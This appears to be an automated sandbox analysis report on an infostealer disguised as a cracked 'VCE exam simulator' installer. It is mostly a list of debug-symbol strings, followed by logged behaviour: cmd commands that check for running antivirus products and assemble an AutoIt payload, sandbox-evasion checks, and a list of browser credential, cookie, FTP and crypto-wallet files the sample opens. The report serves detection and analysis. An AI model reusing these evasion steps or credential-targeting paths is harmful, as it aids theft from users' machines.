            Source: Binary string: pcwum.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SyncInfrastructurePS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: time-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IMEDICAPICCPS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-stringloader-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wsnmp32.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-processthreads-l1-1-2.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msxactps.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shunimpl.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: NcdProp.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: RacEngn.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: PerfCounterInstaller.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: framedyn.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odbcji32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mdminst.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pstorec.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odbcbcp.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: NetworkItemFactory.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IMTCTRLN.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msafd.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaurl.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: dfshim.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: oddbse32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: DBnmpntw.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-privateprofile-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SetIEInstalledDateAI.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-shlwapi-legacy-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ODBCCR32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IEFileInstallAI.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: RpcNs4.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shunimpl.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: UserDataTypeHelperUtil.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: grouptrusteeai.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmcfg32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cliconfg.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SetIEInstalledDateAI.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IconCodecService.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: API-MS-Win-Security-LsaPolicy-L1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmlua.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: TTDPlm.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mdminst.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir50_qcx.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: vpnikeapi.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: fvecerts.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cliconfg.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mssip32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: LAPRXY.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IconCodecService.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-security-lsalookup-l2-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-processenvironment-l1-2-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: TTDLoader.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: netfxconfig.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msiwer.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-service-private-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wmdrmsdk.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: icmp.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ms-win-core-version-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SEMgrPS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmstplua.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: spnet.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-service-management-l2-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir50_32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-localization-obsolete-l1-2-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odpdx32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mscat32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ProximityCommon.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ifsutilx.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: security.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: securebootai.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: oddbse32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: VirtualDisplayManager.ProxyStubs.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SensApi.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: nddeapi.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odexl32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmstplua.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: DBnmpntw.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msjint40.pdbV source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SAS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: icmp.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shpafact.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: rasctrs.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: Microsoft.BitLocker.Structures.pdbiC source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: icmui.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ms-win-service-management-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: uniplat.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: altspace.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mrt100.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: grouptrusteeai.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wshunix.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: security.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-file-l2-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tapisysprep.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tapiperf.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: licmgr10.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: syssetup.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odexl32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mgmtapi.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SensApi.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: NcdProp.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: panmap.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: avicap32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ntlanui2.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: RacEngn.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: VEore-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wsnmp32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: lz32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tpmcompc.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wksprtPS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaer.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: UserDataTypeHelperUtil.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-security-provider-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmcfg32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SAS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ntlanui2.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ZipContainer.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wmcodecdspps.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-debug-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odfox32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mfdvdec.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: NetworkItemFactory.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: LAPRXY.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wsock32.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: API-MS-Win-Core-Kernel32-Private-L1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ws2help.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pwrshplugin.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SyncInfrastructurePS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-string-obsolete-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msiwer.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ms-win-security-lsalookup-l2-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IEFileInstallAI.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wksprtPS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msrle32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: sqlxmlx.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mfH263Enc.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-registry-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-security-sddl-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odfox32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pcwum.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wmcodecdspps.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shfolder.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: rnr20.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SEMgrPS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: WSClient.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: TTDPlm.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: MFVFW.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaurl.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaer.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmlua.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msrating.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: rnr20.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: uniplat.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wlanutil.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tient.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir50_32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shfolder.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: PerfCounterInstaller.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-threadpool-private-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msimtf.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odtext32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: riched32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: riched32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: hmmapi.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wmdrmsdk.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: spwinsat.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: avicap32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msxactps.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: PerceptionSimulation.ProxyStubs.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: API-MS-Win-Core-ProcessTopology-Obsolete-L1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tapisysprep.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: svcext.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mrt_map.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir41_qcx.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: VirtualDisplayManager.ProxyStubs.pdb source: vce exam simulator 2.2.1 crackk.exe

            Persistence and Installation Behavior

            Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\459250\Spa.com
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com System information queried: FirmwareTableInformation
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com TID: 7896 Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com TID: 7892 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\459250\
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\459250
            Source: Spa.com, 0000000A.00000003.2227913157.0000000001D33000.00000004.00000020.00020000.00000000.sdmp, Spa.com, 0000000A.00000002.2229391577.0000000001D33000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
            Source: Spa.com, 0000000A.00000002.2229775200.00000000043E4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: Spa.com, 0000000A.00000002.2229775200.00000000043E4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWc
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Walls Walls.cmd & Walls.cmd
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 459250
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Sorry" Branches
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Penalties + ..\Let + ..\No + ..\Giant + ..\Instance + ..\Reed + ..\Hawk y
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\459250\Spa.com Spa.com y
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: Spa.com, 0000000A.00000002.2228331112.0000000000513000.00000002.00000001.01000000.00000007.sdmp, Spa.com, 0000000A.00000003.2000406005.000000000497D000.00000004.00000800.00020000.00000000.sdmp, Spa.com.1.dr, Earned.0.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Spa.com, 0000000A.00000003.2228208170.0000000001D50000.00000004.00000020.00020000.00000000.sdmp, Spa.com, 0000000A.00000003.2227913157.0000000001D50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: Process Memory Space: Spa.com PID: 7600, type: MEMORYSTR
            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: Spa.com, 0000000A.00000002.2229354757.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum-LTC\wallets
            Source: Spa.com, 0000000A.00000002.2229354757.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\ElectronCash\wallets
            Source: Spa.com, 0000000A.00000002.2229354757.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/JAXX New Version
            Source: Spa.com, 0000000A.00000003.2227913157.0000000001D33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.lib<
            Source: Spa.com, 0000000A.00000002.2229354757.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: Spa.com, 0000000A.00000003.2227913157.0000000001D33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","
            Source: Spa.com, 0000000A.00000003.2228131384.0000000004475000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\FTPGetter
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\FTPInfo
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\FTPbox
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\FTPRush
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\ProgramData\SiteDesigner\3D-FTP
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | Directory queried: C:\Users\user\Documents\JSDNGYCOWY
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | Directory queried: C:\Users\user\Documents\DVWHKMNFNN
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | Directory queried: C:\Users\user\Documents\VAMYDFPUND
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.com | Directory queried: C:\Users\user\Documents\WKXEWIOTXI
            Source: Yara match | File source: Process Memory Space: Spa.com PID: 7600, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: Process Memory Space: Spa.com PID: 7600, type: MEMORYSTR
            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
